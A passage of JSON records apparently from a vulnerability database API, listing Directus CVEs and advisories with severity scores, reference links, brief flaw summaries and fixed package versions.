"", "reference_type": "", "scores": [ { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55944", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55942", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55821", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55957", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34708" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34708", "reference_id": "CVE-2024-34708", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34708" }, { "reference_url": "https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b", "reference_id": "e70a90c267bea695afce6545174c2b77517d617b", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/" } ], "url": "https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b" }, { "reference_url": "https://github.com/advisories/GHSA-p8v3-m643-4xqx", "reference_id": "GHSA-p8v3-m643-4xqx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p8v3-m643-4xqx" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx", "reference_id": "GHSA-p8v3-m643-4xqx", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/31010?format=api", "purl": "pkg:npm/directus@10.11.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0" } ], "aliases": [ "CVE-2024-34708", "GHSA-p8v3-m643-4xqx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s39d-aw92-hydh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90555?format=api", "vulnerability_id": "VCID-tp8r-hnf7-fkaf", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64749", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15725", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15744", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15606", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15758", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64749" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64749", "reference_id": "CVE-2025-64749", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64749" }, { "reference_url": "https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31", "reference_id": "f99c9b89071f9d136cc9b0d0c182f2d24542bc31", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/" } ], "url": "https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31" }, { "reference_url": "https://github.com/advisories/GHSA-cph6-524f-3hgr", "reference_id": "GHSA-cph6-524f-3hgr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cph6-524f-3hgr" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr", "reference_id": "GHSA-cph6-524f-3hgr", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64749", "GHSA-cph6-524f-3hgr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tp8r-hnf7-fkaf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/145868?format=api", "vulnerability_id": "VCID-u121-7x5t-3fcg", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27474", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75025", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75035", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75038", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.74955", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27474" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27474", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27474" }, { "reference_url": "https://github.com/directus/directus/issues/17119", "reference_id": "17119", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/issues/17119" }, { "reference_url": "https://github.com/directus/directus/pull/17120", "reference_id": "17120", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/pull/17120" }, { "reference_url": "https://github.com/advisories/GHSA-4hmq-ggrm-qfc6", "reference_id": "GHSA-4hmq-ggrm-qfc6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hmq-ggrm-qfc6" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6", "reference_id": "GHSA-4hmq-ggrm-qfc6", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32456?format=api", "purl": "pkg:npm/directus@9.23.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-f3pv-2cf5-3bg8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/393033?format=api", "purl": "pkg:npm/directus@9.23.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1" } ], "aliases": [ "CVE-2023-27474", "GHSA-4hmq-ggrm-qfc6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u121-7x5t-3fcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55644?format=api", "vulnerability_id": "VCID-u4er-eddz-g7aq", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. The problem has been resolved in versions 10.8.3 and newer.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27296", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63634", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63623", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63521", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63637", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27296" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0", "reference_id": "a5a1c26ac48795ed3212a4c51b9523588aff4fa0", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/" } ], "url": "https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27296", "reference_id": "CVE-2024-27296", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27296" }, { "reference_url": "https://github.com/advisories/GHSA-5mhg-wv8w-p59j", "reference_id": "GHSA-5mhg-wv8w-p59j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5mhg-wv8w-p59j" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j", "reference_id": "GHSA-5mhg-wv8w-p59j", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29477?format=api", "purl": "pkg:npm/directus@10.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3" } ], "aliases": [ "CVE-2024-27296", "GHSA-5mhg-wv8w-p59j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u4er-eddz-g7aq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71570?format=api", "vulnerability_id": "VCID-u5hw-p46t-jybc", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus' TUS resumable upload endpoint (/files/tus) allows any authenticated user with basic file upload permissions to overwrite arbitrary existing files by UUID. The TUS controller performs only collection-level authorization checks, verifying the user has some permission on directus_files, but never validates item-level access to the specific file being replaced. As a result, row-level permission rules (e.g., \"users can only update their own files\") are completely bypassed via the TUS path while being correctly enforced on the standard REST upload path. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35412", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02422", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02424", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03648", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03634", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35412" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35412", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35412" }, { "reference_url": "https://github.com/advisories/GHSA-qqmv-5p3g-px89", "reference_id": "GHSA-qqmv-5p3g-px89", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qqmv-5p3g-px89" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89", "reference_id": "GHSA-qqmv-5p3g-px89", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35412", "GHSA-qqmv-5p3g-px89" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u5hw-p46t-jybc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212209?format=api", "vulnerability_id": "VCID-ua8h-tmak-hufd", "summary": "Duplicate Advisory: Improper access control in Directus", "references": [ { "reference_url": "https://directus.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://directus.io" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534", 